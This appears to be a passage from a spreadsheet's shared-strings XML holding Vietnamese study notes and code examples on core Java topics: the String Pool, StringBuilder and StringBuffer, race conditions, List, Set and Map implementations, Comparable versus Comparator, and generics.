System.out.println(s2); // Output: Hello World (s2 là chuỗi mới)</t>
  </si>
  <si>
    <t>String s1 = "Java";
String s2 = "Java"; // s2 sẽ trỏ đến cùng một đối tượng "Java" với s1 trong String pool
System.out.println(s1 == s2); // Output: true</t>
  </si>
  <si>
    <t>Hiểu biết về String Pool?</t>
  </si>
  <si>
    <t>String Pool là một khu vực đặc biệt trong bộ nhớ heap (hoặc đôi khi là PermGen/Metaspace trong các phiên bản Java cũ) nơi lưu trữ các đối tượng String duy nhất (unique String objects). Mục tiêu chính của String Pool là tái sử dụng các chuỗi giống nhau để giảm thiểu việc tạo ra các đối tượng trùng lặp trong bộ nhớ.Nếu chuỗi đã tồn tại: Thay vì tạo một đối tượng String mới, hệ thống sẽ trả về tham chiếu đến đối tượng String hiện có trong String Pool. Điều này giúp tiết kiệm bộ nhớ đáng kể.
Nếu chuỗi chưa tồn tại: Hệ thống sẽ tạo một đối tượng String mới và thêm nó vào String Pool, sau đó trả về tham chiếu đến đối tượng mới này.</t>
  </si>
  <si>
    <t>String s1 = "Hello"; // "Hello" được kiểm tra trong String Pool
String s2 = "Hello"; // s2 sẽ trỏ đến cùng một đối tượng "Hello" với s1
String s3 = "World"; // "World" được kiểm tra/thêm vào String Pool
System.out.println(s1 == s2); // Output: true (cùng tham chiếu)
System.out.println(s1 == s3); // Output: false (khác tham chiếu)</t>
  </si>
  <si>
    <t>Sử dụng từ khóa new:
Khi bạn tạo một String bằng cách sử dụng từ khóa new, bạn luôn tạo ra một đối tượng String mới trong bộ nhớ heap, bất kể nội dung của nó có giống với một chuỗi nào đó đã có trong String Pool hay không.String s4 = new String("Java"); // Tạo một đối tượng mới "Java" trên heap
String s5 = new String("Java"); // Tạo một đối tượng mới khác "Java" trên heap
String s6 = "Java";            // Trỏ đến "Java" trong String Pool
System.out.println(s4 == s5); // Output: false (hai đối tượng khác nhau trên heap)
System.out.println(s4 == s6); // Output: false (s4 trên heap, s6 trong pool)
System.out.println(s5 == s6); // Output: false</t>
  </si>
  <si>
    <t xml:space="preserve">Hiểu về 2 lớp StringBuilder và StringBuffer? Cả StringBuilder và StringBuffer đều duy trì một mảng ký tự bên trong (thường là một char[] hoặc tương tự) để lưu trữ nội dung chuỗi. Khi bạn thực hiện các thao tác như append(), insert(), delete(), v.v., chúng sẽ sửa đổi mảng ký tự này trực tiếp. Nếu mảng ký tự không đủ dung lượng, chúng sẽ tự động mở rộng nó (bằng cách tạo một mảng mới lớn hơn và sao chép nội dung cũ sang). Cả hai lớp đều cung cấp các phương thức tương tự nhau để thao tác chuỗi:
</t>
  </si>
  <si>
    <t>Tổng quan về StringBuilder và StringBuffer
Khi bạn thao tác chuỗi trong Java, bạn đã biết String là bất biến (immutable). Điều này có nghĩa là mỗi khi bạn thực hiện một thao tác "thay đổi" trên một đối tượng String (ví dụ: nối chuỗi), Java sẽ tạo ra một đối tượng String mới trong bộ nhớ. Nếu bạn thực hiện nhiều thao tác nối chuỗi trong một vòng lặp, điều này sẽ dẫn đến việc tạo ra hàng loạt các đối tượng String tạm thời, gây lãng phí bộ nhớ và giảm hiệu suất do Garbage Collector phải hoạt động nhiều hơn.
Để giải quyết vấn đề này, Java cung cấp hai lớp là StringBuilder và StringBuffer. Cả hai lớp này đều đại diện cho các chuỗi có thể thay đổi được (mutable). Thay vì tạo ra một đối tượng mới sau mỗi thao tác, chúng sửa đổi trực tiếp nội dung của chuỗi hiện có.</t>
  </si>
  <si>
    <t>append(data): Thêm dữ liệu vào cuối chuỗi. data có thể là String, char, int, boolean, v.v.
insert(offset, data): Chèn dữ liệu vào một vị trí cụ thể trong chuỗi.
delete(start, end): Xóa một phần chuỗi từ vị trí start đến end - 1.
reverse(): Đảo ngược thứ tự các ký tự trong chuỗi.
setCharAt(index, char): Thay đổi ký tự tại một vị trí cụ thể.
length(): Trả về độ dài của chuỗi.
capacity(): Trả về dung lượng hiện tại của bộ đệm ký tự.
toString(): Chuyển đổi nội dung của StringBuilder/StringBuffer thành một đối tượng String (immutable).</t>
  </si>
  <si>
    <t>Ví dụ về 2 trường hợp đó ?</t>
  </si>
  <si>
    <t>Khi nào sử dụng cái nào?
Sử dụng StringBuilder khi:
Bạn đang làm việc trong một môi trường đơn luồng (single-threaded environment).
Bạn cần hiệu suất tối đa cho các thao tác chuỗi.
Đây là lựa chọn được khuyến nghị trong hầu hết các trường hợp thông thường.
Sử dụng StringBuffer khi:
Bạn đang làm việc trong một môi trường đa luồng (multi-threaded environment).
Nhiều luồng có thể cùng lúc truy cập và sửa đổi cùng một đối tượng chuỗi, và bạn cần đảm bảo tính nhất quán của dữ liệu mà không cần tự xử lý đồng bộ hóa thủ công.
Lưu ý: Ngay cả trong môi trường đa luồng, đôi khi việc tự quản lý đồng bộ hóa bằng các cơ chế cấp cao hơn (như Lock hoặc synchronized trên khối code cụ thể) với StringBuilder có thể cung cấp sự kiểm soát tốt hơn và hiệu suất tối ưu hơn nếu chỉ một phần nhỏ của code cần được đồng bộ hóa. Tuy nhiên, StringBuffer là lựa chọn đơn giản và an toàn mặc định cho trường hợp này.
Sử dụng String khi:
Bạn không cần thay đổi nội dung của chuỗi sau khi nó được tạo.
Bạn đang sử dụng các chuỗi literal hoặc hằng số.
Bạn cần các tính năng của String Pool (ví dụ: equals() so sánh nội dung, == so sánh tham chiếu nếu chuỗi là literal).</t>
  </si>
  <si>
    <t>// Lớp Counter đơn giản
class Counter {
    private int count = 0;
    public void increment() {
        count++; // Tăng giá trị của biến đếm
    }
    public int getCount() {
        return count;
    }
}
public class SingleThreadExample {
    public static void main(String[] args) {
        Counter counter = new Counter();
        int iterations = 10000; // Số lần tăng
        // Thực hiện tăng đếm trong một luồng duy nhất
        for (int i = 0; i &lt; iterations; i++) {
            counter.increment();
        }
        System.out.println("Single-threaded final count: " + counter.getCount());
        // Kết quả mong đợi: 10000
    }
}</t>
  </si>
  <si>
    <t>// Lớp Counter (không thay đổi)
class UnsafeCounter {
    private int count = 0;
    public void increment() {
        count++; // count = count + 1;
        // Thực chất phép toán này không phải là nguyên tử (atomic) mà gồm 3 bước:
        // 1. Đọc giá trị của count
        // 2. Tăng giá trị đã đọc lên 1
        // 3. Ghi giá trị mới vào count
    }
    public int getCount() {
        return count;
    }
}
public class MultiThreadExampleUnsafe {
    public static void main(String[] args) throws InterruptedException {
        UnsafeCounter counter = new UnsafeCounter();
        int numThreads = 10;   // Số lượng luồng
        int iterationsPerThread = 1000; // Số lần tăng mỗi luồng
        int totalExpectedCount = numThreads * iterationsPerThread; // 10 * 1000 = 10000
        Thread[] threads = new Thread[numThreads];
        // Tạo và khởi chạy các luồng
        for (int i = 0; i &lt; numThreads; i++) {
            threads[i] = new Thread(() -&gt; {
                for (int j = 0; j &lt; iterationsPerThread; j++) {
                    counter.increment();
                }
            });
            threads[i].start(); // Bắt đầu luồng
        }
        // Chờ tất cả các luồng kết thúc
        for (int i = 0; i &lt; numThreads; i++) {
            threads[i].join(); // main thread chờ các luồng con hoàn thành
        }
        System.out.println("Multi-threaded (UNSAFE) final count: " + counter.getCount());
        System.out.println("Total expected count: " + totalExpectedCount);
        // Kết quả THỰC TẾ thường sẽ KHÔNG phải là 10000
    }
}</t>
  </si>
  <si>
    <t>Hiểu về đặc điểm interface List?</t>
  </si>
  <si>
    <t>Tóm tắt đặc điểm List:
List là tập hợp có thứ tự và cho phép các phần tử trùng lặp. Nó cung cấp khả năng truy cập theo chỉ mục mạnh mẽ và là lựa chọn lý tưởng khi bạn cần duy trì thứ tự chèn của các phần tử và thường xuyên truy cập chúng theo vị trí. Việc lựa chọn giữa ArrayList và LinkedList phụ thuộc vào các hoạt động (chèn/xóa vs. truy cập) mà bạn dự định thực hiện thường xuyên hơn.</t>
  </si>
  <si>
    <t>public class ListExample {
    public static void main(String[] args) {
        // Khai báo List và khởi tạo với ArrayList
        List&lt;String&gt; fruits = new ArrayList&lt;&gt;();
        // 1. Thêm phần tử (theo thứ tự)
        fruits.add("Apple");
        fruits.add("Banana");
        fruits.add("Cherry");
        fruits.add("Apple"); // List cho phép trùng lặp
        System.out.println("Initial List: " + fruits); // Output: [Apple, Banana, Cherry, Apple]
        // 2. Truy cập phần tử theo chỉ mục
        String firstFruit = fruits.get(0);
        String thirdFruit = fruits.get(2);
        System.out.println("First fruit: " + firstFruit);  // Output: Apple
        System.out.println("Third fruit: " + thirdFruit);  // Output: Cherry
        // 3. Chèn phần tử vào một vị trí cụ thể
        fruits.add(1, "Grape"); // Chèn "Grape" vào chỉ mục 1
        System.out.println("List after adding Grape at index 1: " + fruits); // Output: [Apple, Grape, Banana, Cherry, Apple]
        // 4. Thay thế phần tử
        fruits.set(3, "Mango"); // Thay thế phần tử ở chỉ mục 3 (Cherry) bằng Mango
        System.out.println("List after setting index 3 to Mango: " + fruits); // Output: [Apple, Grape, Banana, Mango, Apple]
        // 5. Xóa phần tử
        fruits.remove(0); // Xóa phần tử ở chỉ mục 0 ("Apple")
        System.out.println("List after removing element at index 0: " + fruits); // Output: [Grape, Banana, Mango, Apple]
        fruits.remove("Banana"); // Xóa phần tử "Banana" (lần xuất hiện đầu tiên)
        System.out.println("List after removing 'Banana': " + fruits); // Output: [Grape, Mango, Apple]
        // 6. Kích thước của List
        System.out.println("Current size of list: " + fruits.size()); // Output: 3
        // 7. Kiểm tra sự tồn tại của phần tử
        System.out.println("Does list contain 'Mango'? " + fruits.contains("Mango")); // Output: true
        System.out.println("Does list contain 'Orange'? " + fruits.contains("Orange")); // Output: false
        // 8. Tìm chỉ mục của phần tử
        System.out.println("Index of 'Apple': " + fruits.indexOf("Apple")); // Output: 2
        fruits.add("Mango"); // Thêm Mango lần nữa để thử lastIndexOf
        System.out.println("List with duplicate Mango: " + fruits); // Output: [Grape, Mango, Apple, Mango]
        System.out.println("First index of 'Mango': " + fruits.indexOf("Mango"));   // Output: 1
        System.out.println("Last index of 'Mango': " + fruits.lastIndexOf("Mango")); // Output: 3
        // 9. Duyệt List bằng vòng lặp for-each
        System.out.println("\nIterating with for-each loop:");
        for (String fruit : fruits) {
            System.out.println(fruit);
        }
        // 10. Duyệt List bằng Iterator
        System.out.println("\nIterating with Iterator:");
        Iterator&lt;String&gt; it = fruits.iterator();
        while (it.hasNext()) {
            System.out.println(it.next());
            // it.remove(); // Có thể xóa phần tử an toàn khi duyệt
        }
        // 11. Duyệt List bằng ListIterator (tiến và lùi)
        System.out.println("\nIterating with ListIterator (forward):");
        ListIterator&lt;String&gt; listIt = fruits.listIterator();
        while (listIt.hasNext()) {
            System.out.println(listIt.next() + " (next index: " + listIt.nextIndex() + ")");
        }
        System.out.println("\nIterating with ListIterator (backward):");
        // listIt đang ở cuối sau vòng lặp trên.
        while (listIt.hasPrevious()) {
            System.out.println(listIt.previous() + " (previous index: " + listIt.previousIndex() + ")");
        }
    }
}</t>
  </si>
  <si>
    <t>So sánh sự giống và khác nhau giữa  ArrayList, Vector, LinkedList? và đặc điểm từng loaij</t>
  </si>
  <si>
    <t>Cơ chế lưu trữ: Dựa trên cấu trúc dữ liệu danh sách liên kết kép (doubly linked list). Mỗi phần tử (node) trong LinkedList chứa dữ liệu, một tham chiếu đến phần tử tiếp theo, và một tham chiếu đến phần tử trước đó.
Tính Thread-Safety: Không thread-safe. Tương tự như ArrayList, LinkedList không có cơ chế đồng bộ hóa tích hợp. ArrayList
Đặc điểm:
Cơ chế lưu trữ: Dựa trên một mảng động (resizable array) bên trong. Khi mảng đầy, nó sẽ tạo một mảng mới lớn hơn (thường là 1.5 lần kích thước hiện tại) và sao chép tất cả các phần tử cũ sang mảng mới.
Tính Thread-Safety: Không thread-safe. Các phương thức của ArrayList không được đồng bộ hóa. Điều này có nghĩa là nếu nhiều luồng cùng lúc truy cập và sửa đổi một ArrayList mà không có cơ chế đồng bộ hóa bên ngoài, có thể xảy ra các vấn đề về tính nhất quán dữ liệu (race conditions).</t>
  </si>
  <si>
    <t>Nắm được sự khác nhau giữa  Comparator and Comparable? và đặc điểm của chúng</t>
  </si>
  <si>
    <t>Đặc điểm:
"Tự so sánh" (Self-comparable): Interface Comparable được triển khai bởi chính lớp đối tượng mà bạn muốn sắp xếp. Điều này có nghĩa là một đối tượng có khả năng so sánh chính nó với một đối tượng khác cùng loại.
Thứ tự tự nhiên (Natural Ordering): Comparable được sử dụng để định nghĩa thứ tự tự nhiên (natural ordering) của các đối tượng trong một lớp. Đây là cách sắp xếp mặc định mà các đối tượng của lớp đó sẽ tuân theo khi được sắp xếp mà không có tiêu chí sắp xếp cụ thể nào khác được cung cấp.Quy ước chặt chẽ: Việc triển khai compareTo() phải tuân thủ các quy tắc sau:
sgn(x.compareTo(y)) == -sgn(y.compareTo(x)) (tính đối xứng).
Nếu x.compareTo(y) &gt; 0 và y.compareTo(z) &gt; 0 thì x.compareTo(z) &gt; 0 (tính bắc cầu).
x.compareTo(y) == 0 ngụ ý sgn(x.compareTo(z)) == sgn(y.compareTo(z)) cho tất cả z (tính nhất quán).
Cần đảm bảo (x.compareTo(y) == 0) khi và chỉ khi (x.equals(y)) là lý tưởng (nhưng không bắt buộc). Nếu không, cần ghi rõ.</t>
  </si>
  <si>
    <t>Before sorting (Comparable):
Person [name=Alice, age=30]
Person [name=Charlie, age=25]
Person [name=Bob, age=35]
Person [name=Alice, age=28]
After sorting by name (using Comparable):
Person [name=Alice, age=30]
Person [name=Alice, age=28]
Person [name=Bob, age=35]
Person [name=Charlie, age=25]</t>
  </si>
  <si>
    <t>class Person implements Comparable&lt;Person&gt; {
    private String name;
    private int age;
    @Override
    public String toString() {
        return "Person [name=" + name + ", age=" + age + "]";
    }
    @Override
    public int compareTo(Person other) {
        // Định nghĩa thứ tự tự nhiên: sắp xếp theo tên (từ A-Z)
        return this.name.compareTo(other.name);
    }
}
public class ComparableExample {
    public static void main(String[] args) {
        List&lt;Person&gt; people = new ArrayList&lt;&gt;();
        people.add(new Person("Alice", 30));
        people.add(new Person("Charlie", 25));
        people.add(new Person("Bob", 35));
        people.add(new Person("Alice", 28)); // Một người Alice khác
        System.out.println("Before sorting (Comparable):");
        for (Person p : people) {
            System.out.println(p);
        }
        Collections.sort(people); // Sắp xếp bằng thứ tự tự nhiên (compareTo của Person)
        System.out.println("\nAfter sorting by name (using Comparable):");
        for (Person p : people) {
            System.out.println(p);
        }
    }
}</t>
  </si>
  <si>
    <t>Nắm được sự khác nhau giữa  Comparator and Comparable</t>
  </si>
  <si>
    <t>Sử dụng Comparable khi:
Bạn muốn định nghĩa một thứ tự mặc định hoặc "tự nhiên" cho các đối tượng của lớp bạn.
Bạn có quyền sửa đổi mã nguồn của lớp đó.
Lớp đó chỉ có một tiêu chí sắp xếp chính mà bạn muốn nó tuân theo một cách nhất quán.
Sử dụng Comparator khi:
Bạn muốn định nghĩa nhiều cách sắp xếp khác nhau cho cùng một lớp đối tượng.
Bạn không có quyền sửa đổi mã nguồn của lớp đối tượng (ví dụ: các lớp có sẵn trong Java API như String, Integer đã có Comparable nhưng bạn muốn sắp xếp theo cách khác).
Lớp đã có thứ tự tự nhiên (Comparable), nhưng bạn cần một thứ tự khác cho một trường hợp cụ thể mà không muốn thay đổi thứ tự tự nhiên.
Bạn muốn sắp xếp các đối tượng theo nhiều tiêu chí (ví dụ: sắp xếp theo tên, sau đó theo tuổi).</t>
  </si>
  <si>
    <t>Original List:
Person [name=Alice, age=30]
Person [name=Charlie, age=25]
Person [name=Bob, age=35]
Person [name=Alice, age=28]
After sorting by age (ascending, using Comparator):
Person [name=Charlie, age=25]
Person [name=Alice, age=28]
Person [name=Alice, age=30]
Person [name=Bob, age=35]
After sorting by name (descending, using Comparator.comparing().reversed()):
Person [name=Charlie, age=25]
Person [name=Bob, age=35]
Person [name=Alice, age=30]
Person [name=Alice, age=28]
After sorting by name then by age (using Comparator.comparing().thenComparing()):
Person [name=Alice, age=28]
Person [name=Alice, age=30]
Person [name=Bob, age=35]
Person [name=Charlie, age=25]</t>
  </si>
  <si>
    <t>public class ComparatorExample {
    public static void main(String[] args) {
        List&lt;Person&gt; people = new ArrayList&lt;&gt;();
        people.add(new Person("Alice", 30));
        people.add(new Person("Charlie", 25));
        people.add(new Person("Bob", 35));
        people.add(new Person("Alice", 28)); // Một người Alice khác
        System.out.println("Original List:");
        for (Person p : people) {
            System.out.println(p);
        }
        // --- Sắp xếp theo tuổi (tăng dần) sử dụng Anonymous Inner Class ---
        Collections.sort(people, new Comparator&lt;Person&gt;() {
            @Override
            public int compare(Person p1, Person p2) {
                return Integer.compare(p1.getAge(), p2.getAge());
            }
        });
        System.out.println("\nAfter sorting by age (ascending, using Comparator):");
        for (Person p : people) {
            System.out.println(p);
        }
        // --- Sắp xếp theo tên (giảm dần) sử dụng Lambda Expression (Java 8+) ---
        // Comparator.comparing() là một helper method rất tiện lợi
        Collections.sort(people, Comparator.comparing(Person::getName).reversed());
        System.out.println("\nAfter sorting by name (descending, using Comparator.comparing().reversed()):");
        for (Person p : people) {
            System.out.println(p);
        }
        // --- Sắp xếp theo nhiều tiêu chí: theo tên tăng dần, nếu tên giống nhau thì theo tuổi tăng dần ---
        Collections.sort(people, Comparator.comparing(Person::getName)
                                           .thenComparing(Person::getAge));
        System.out.println("\nAfter sorting by name then by age (using Comparator.comparing().thenComparing()):");
        for (Person p : people) {
            System.out.println(p);
        }
    }</t>
  </si>
  <si>
    <t>Hiểu về đặc điểm interface Set?</t>
  </si>
  <si>
    <t>Set là tập hợp không có phần tử trùng lặp. Nó không đảm bảo thứ tự của các phần tử theo mặc định. Lựa chọn giữa HashSet, LinkedHashSet, và TreeSet phụ thuộc vào yêu cầu của bạn về hiệu suất, thứ tự các phần tử, và liệu bạn có cần sắp xếp tự động hay không.</t>
  </si>
  <si>
    <t>HashSet:
Cơ chế lưu trữ: Dựa trên một bảng băm (hash table) để lưu trữ các phần tử. Nó sử dụng mã băm (hashCode()) và phương thức equals() của các phần tử để xác định tính duy nhất và vị trí lưu trữ.
Thứ tự: Không đảm bảo thứ tự của các phần tử. Thứ tự có thể thay đổi theo thời gian.
Hiệu suất: Cung cấp hiệu suất tốt nhất cho các thao tác cơ bản như thêm (add()), xóa (remove()), và kiểm tra sự tồn tại (contains()). Các thao tác này thường có độ phức tạp trung bình là O(1) (thời gian hằng số) nếu hàm băm phân phối tốt.
Phù hợp khi: Bạn cần các thao tác tìm kiếm, thêm, xóa nhanh chóng và không quan tâm đến thứ tự của các phần tử.
LinkedHashSet:
Cơ chế lưu trữ: Kế thừa từ HashSet và kết hợp với một danh sách liên kết (linked list) để duy trì thứ tự chèn.
Thứ tự: Duy trì thứ tự chèn (insertion order) của các phần tử.
Hiệu suất: Hiệu suất tương tự HashSet cho các thao tác cơ bản, nhưng có chi phí cao hơn một chút do việc duy trì danh sách liên kết.
Phù hợp khi: Bạn cần một Set không có trùng lặp và vẫn muốn duy trì thứ tự mà các phần tử được thêm vào.
TreeSet:
Cơ chế lưu trữ: Dựa trên một cây tìm kiếm nhị phân cân bằng (balanced binary search tree), cụ thể là Red-Black Tree.
Thứ tự: Duy trì các phần tử theo thứ tự sắp xếp tự nhiên (natural order) của chúng (nếu các phần tử triển khai Comparable) hoặc theo một Comparator được cung cấp khi tạo TreeSet.
Hiệu suất: Các thao tác add(), remove(), contains() có độ phức tạp là O(log n) (logarithmic time). Nó cũng cung cấp các phương thức để tìm kiếm phần tử nhỏ nhất/lớn nhất, phần tử nhỏ hơn/lớn hơn một ngưỡng nào đó.
Phù hợp khi: Bạn cần một Set không có trùng lặp và các phần tử cần được sắp xếp tự động, hoặc bạn cần các thao tác liên quan đến thứ tự (như tìm kiếm phần tử nhỏ nhất, lớn nhất, trong một phạm vi).</t>
  </si>
  <si>
    <t>public class SetExample {
    public static void main(String[] args) {
        // --- 1. Sử dụng HashSet (không có thứ tự, nhanh) ---
        System.out.println("--- HashSet Example ---");
        Set&lt;String&gt; hashSet = new HashSet&lt;&gt;();
        hashSet.add("Apple");
        hashSet.add("Banana");
        hashSet.add("Cherry");
        hashSet.add("Apple"); // Thêm trùng lặp, sẽ bị bỏ qua
        hashSet.add("Date");
        hashSet.add("Banana"); // Thêm trùng lặp, sẽ bị bỏ qua
        hashSet.add(null);   // Cho phép null
        hashSet.add(null);   // Null thứ hai sẽ bị bỏ qua
        System.out.println("HashSet: " + hashSet);
        // Output có thể thay đổi thứ tự: [null, Apple, Date, Banana, Cherry] hoặc tương tự
        System.out.println("Size of HashSet: " + hashSet.size()); // Output: 5 (null, Apple, Banana, Cherry, Date)
        System.out.println("Contains 'Banana'? " + hashSet.contains("Banana")); // Output: true
        System.out.println("Remove 'Cherry': " + hashSet.remove("Cherry")); // Output: true
        System.out.println("HashSet after removal: " + hashSet);
        // --- 2. Sử dụng LinkedHashSet (duy trì thứ tự chèn) ---
        System.out.println("\n--- LinkedHashSet Example ---");
        Set&lt;String&gt; linkedHashSet = new LinkedHashSet&lt;&gt;();
        linkedHashSet.add("Apple");
        linkedHashSet.add("Banana");
        linkedHashSet.add("Cherry");
        linkedHashSet.add("Apple"); // Trùng lặp
        linkedHashSet.add("Date");
        linkedHashSet.add(null);
        System.out.println("LinkedHashSet: " + linkedHashSet);
        // Output: [Apple, Banana, Cherry, Date, null] (thứ tự chèn được duy trì)
        System.out.println("Size of LinkedHashSet: " + linkedHashSet.size()); // Output: 5
        // --- 3. Sử dụng TreeSet (sắp xếp tự động) ---
        System.out.println("\n--- TreeSet Example ---");
        Set&lt;String&gt; treeSet = new TreeSet&lt;&gt;();
        treeSet.add("Apple");
        treeSet.add("Banana");
        treeSet.add("Cherry");
        treeSet.add("Apple"); // Trùng lặp
        treeSet.add("Date");
        // treeSet.add(null); // TreeSet KHÔNG cho phép null trừ khi Comparator xử lý null
        System.out.println("TreeSet: " + treeSet);
        // Output: [Apple, Banana, Cherry, Date] (sắp xếp theo thứ tự từ điển)
        System.out.println("Size of TreeSet: " + treeSet.size()); // Output: 4
        // TreeSet với số nguyên
        Set&lt;Integer&gt; sortedNumbers = new TreeSet&lt;&gt;();
        sortedNumbers.add(5);
        sortedNumbers.add(2);
        sortedNumbers.add(8);
        sortedNumbers.add(2); // Trùng lặp
        sortedNumbers.add(1);
        System.out.println("TreeSet of Integers: " + sortedNumbers); // Output: [1, 2, 5, 8]
    }
}</t>
  </si>
  <si>
    <t>Hiểu về đặc điểm interface Map?</t>
  </si>
  <si>
    <t xml:space="preserve"> Không kế thừa từ Collection
Đây là một điểm khác biệt lớn so với List và Set. Interface Map không kế thừa từ Collection. Thay vào đó, nó là một giao diện độc lập trong Java Collections Framework. Điều này là do Map đại diện cho một ánh xạ (mapping), không phải là một tập hợp đơn thuần của các phần tử.Tuy nhiên, bạn có thể xem Map như một tập hợp của các cặp Entry (khóa-giá trị), hoặc một tập hợp của các khóa, hoặc một tập hợp của các giá trị. Map cung cấp các phương thức để lấy các "collection view" này:
Set&lt;K&gt; keySet(): Trả về một Set chứa tất cả các khóa trong Map.
Collection&lt;V&gt; values(): Trả về một Collection chứa tất cả các giá trị trong Map.
Set&lt;Map.Entry&lt;K, V&gt;&gt; entrySet(): Trả về một Set chứa tất cả các cặp khóa-giá trị (Map.Entry) trong Map.</t>
  </si>
  <si>
    <t xml:space="preserve"> Các lớp triển khai phổ biến của Map
Là một interface, Map không thể được khởi tạo trực tiếp. Thay vào đó, bạn sử dụng các lớp cụ thể triển khai interface này. Mỗi lớp triển khai có những đặc điểm riêng về hiệu suất và cách lưu trữ:
HashMap:
Cơ chế lưu trữ: Dựa trên một bảng băm (hash table). Nó sử dụng mã băm (hashCode()) và phương thức equals() của các khóa để xác định tính duy nhất và vị trí lưu trữ.
Thứ tự: Không đảm bảo thứ tự của các cặp. Thứ tự có thể thay đổi.
Hiệu suất: Cung cấp hiệu suất tốt nhất cho các thao tác cơ bản như thêm (put()), lấy (get()), và xóa (remove()). Các thao tác này thường có độ phức tạp trung bình là O(1) (thời gian hằng số) nếu hàm băm phân phối tốt.
Thread-Safety: Không thread-safe.
Khóa/Giá trị null: Cho phép một khóa null duy nhất và nhiều giá trị null.
Phù hợp khi: Bạn cần các thao tác tìm kiếm, thêm, xóa theo khóa nhanh chóng và không quan tâm đến thứ tự của các cặp khóa-giá trị. Đây là triển khai Map được sử dụng phổ biến nhất.
LinkedHashMap:
Cơ chế lưu trữ: Kế thừa từ HashMap và kết hợp với một danh sách liên kết kép (doubly linked list) để duy trì thứ tự.
Thứ tự: Duy trì thứ tự chèn (insertion order) của các cặp khóa-giá trị. Có một tùy chọn để duy trì thứ tự truy cập (access order) thay vì thứ tự chèn, hữu ích cho các cache LRU (Least Recently Used).
Hiệu suất: Hiệu suất tương tự HashMap cho các thao tác cơ bản, nhưng có chi phí cao hơn một chút do việc duy trì danh sách liên kết.
Thread-Safety: Không thread-safe.
Khóa/Giá trị null: Cho phép một khóa null duy nhất và nhiều giá trị null.
Phù hợp khi: Bạn cần một Map mà vẫn muốn duy trì thứ tự mà các cặp khóa-giá trị được thêm vào (hoặc truy cập).
TreeMap:
Cơ chế lưu trữ: Dựa trên một cây tìm kiếm nhị phân cân bằng (balanced binary search tree), cụ thể là Red-Black Tree.
Thứ tự: Duy trì các cặp khóa-giá trị theo thứ tự sắp xếp tự nhiên (natural order) của các khóa (nếu các khóa triển khai Comparable) hoặc theo một Comparator được cung cấp khi tạo TreeMap.
Hiệu suất: Các thao tác put(), get(), remove() có độ phức tạp là O(log n) (logarithmic time). Nó cũng cung cấp các phương thức để tìm kiếm khóa nhỏ nhất/lớn nhất, các cặp trong một phạm vi, v.v.
Thread-Safety: Không thread-safe.
Khóa/Giá trị null: Không cho phép khóa null (sẽ ném NullPointerException nếu bạn cố gắng thêm khóa null trừ khi Comparator xử lý null), nhưng cho phép giá trị null.
Phù hợp khi: Bạn cần một Map mà các khóa cần được sắp xếp tự động, hoặc bạn cần các thao tác liên quan đến thứ tự của khóa (như tìm kiếm khóa nhỏ nhất, lớn nhất, trong một phạm vi).
Hashtable
Cơ chế lưu trữ: Tương tự HashMap (dựa trên bảng băm).
Thread-Safety: Là thread-safe (các phương thức được đồng bộ hóa).
Hiệu suất: Chậm hơn HashMap do chi phí đồng bộ hóa.
Khóa/Giá trị null: Không cho phép khóa null HOẶC giá trị null.
Legacy Class: Là một lớp cũ hơn, có từ Java 1.0.
Sử dụng: Thường không được khuyến khích sử dụng trong code mới. Thay vào đó, nếu cần thread-safety, hãy dùng ConcurrentHashMap từ java.util.concurrent.</t>
  </si>
  <si>
    <t>public class MapIterationExample {
    public static void main(String[] args) {
        Map&lt;String, String&gt; countryCapitals = new HashMap&lt;&gt;();
        countryCapitals.put("USA", "Washington D.C.");
        countryCapitals.put("France", "Paris");
        countryCapitals.put("Germany", "Berlin");
        countryCapitals.put("Japan", "Tokyo");
        // 1. Duyệt qua keySet() - chỉ lấy khóa
        System.out.println("--- Iterating through keys ---");
        for (String country : countryCapitals.keySet()) {
            System.out.println("Country: " + country);
        }
        // 2. Duyệt qua values() - chỉ lấy giá trị
        System.out.println("\n--- Iterating through values ---");
        for (String capital : countryCapitals.values()) {
            System.out.println("Capital: " + capital);
        }
        // 3. Duyệt qua entrySet() - lấy cả khóa và giá trị (đây là cách phổ biến nhất)
        System.out.println("\n--- Iterating through key-value pairs (Entry Set) ---");
        for (Map.Entry&lt;String, String&gt; entry : countryCapitals.entrySet()) {
            System.out.println("Country: " + entry.getKey() + ", Capital: " + entry.getValue());
        }
        // 4. Duyệt bằng forEach (Java 8+)
        System.out.println("\n--- Iterating using forEach (Java 8+) ---");
        countryCapitals.forEach((country, capital) -&gt;
            System.out.println("Country: " + country + ", Capital: " + capital)
        );
    }
}</t>
  </si>
  <si>
    <t>Generic Class (Lớp Generic)
Một lớp generic được định nghĩa với một hoặc nhiều tham số kiểu (type parameters) trong dấu ngoặc nhọn &lt;&gt;. Các tham số kiểu này hoạt động như các biến placeholder cho các kiểu dữ liệu mà lớp sẽ làm việc.
Cú pháp: class ClassName&lt;T1, T2, ...&gt;
T: Type (loại phổ biến nhất)
E: Element (dùng trong Collection)
K: Key (dùng trong Map)
V: Value (dùng trong Map)
N: Number
S, U: Loại thứ hai, thứ ba...</t>
  </si>
  <si>
    <t>// Định nghĩa Generic Class Box
class Box&lt;T&gt; { // T là tham số kiểu
    private T content; // Kiểu của content là T
    public Box(T content) {
        this.content = content;
    }
    public T getContent() {
        return content;
    }
    public void setContent(T content) {
        this.content = content;
    }
    public void displayContentInfo() {
        System.out.println("Content type: " + content.getClass().getName());
    }
}
public class GenericClassExample {
    public static void main(String[] args) {
        // Tạo một Box chứa String
        Box&lt;String&gt; stringBox = new Box&lt;&gt;("Java Programming");
        System.out.println("String Box content: " + stringBox.getContent());
        stringBox.displayContentInfo(); // Output: Content type: java.lang.String
        // Tạo một Box chứa Integer
        Box&lt;Integer&gt; integerBox = new Box&lt;&gt;(123);
        System.out.println("Integer Box content: " + integerBox.getContent());
        integerBox.displayContentInfo(); // Output: Content type: java.lang.Integer
        // Box&lt;Double&gt; doubleBox = new Box&lt;&gt;(3.14);
        // System.out.println("Double Box content: " + doubleBox.getContent());
    }
}</t>
  </si>
  <si>
    <t>// Định nghĩa Generic Interface Processor
interface Processor&lt;T&gt; {
    void process(T data);
    T getResult();
}
// Lớp triển khai Processor cho String
class StringProcessor implements Processor&lt;String&gt; {
    private String processedData = "";
    @Override
    public void process(String data) {
        this.processedData += data.toUpperCase(); // Chuyển đổi thành chữ hoa
    }
    @Override
    public String getResult() {
        return processedData;
    }
}
// Lớp triển khai Processor cho Integer
class IntegerProcessor implements Processor&lt;Integer&gt; {
    private int sum = 0;
    @Override
    public void process(Integer data) {
        this.sum += data; // Tính tổng
    }
    @Override
    public Integer getResult() {
        return sum;
    }
}
public class GenericInterfaceExample {
    public static void main(String[] args) {
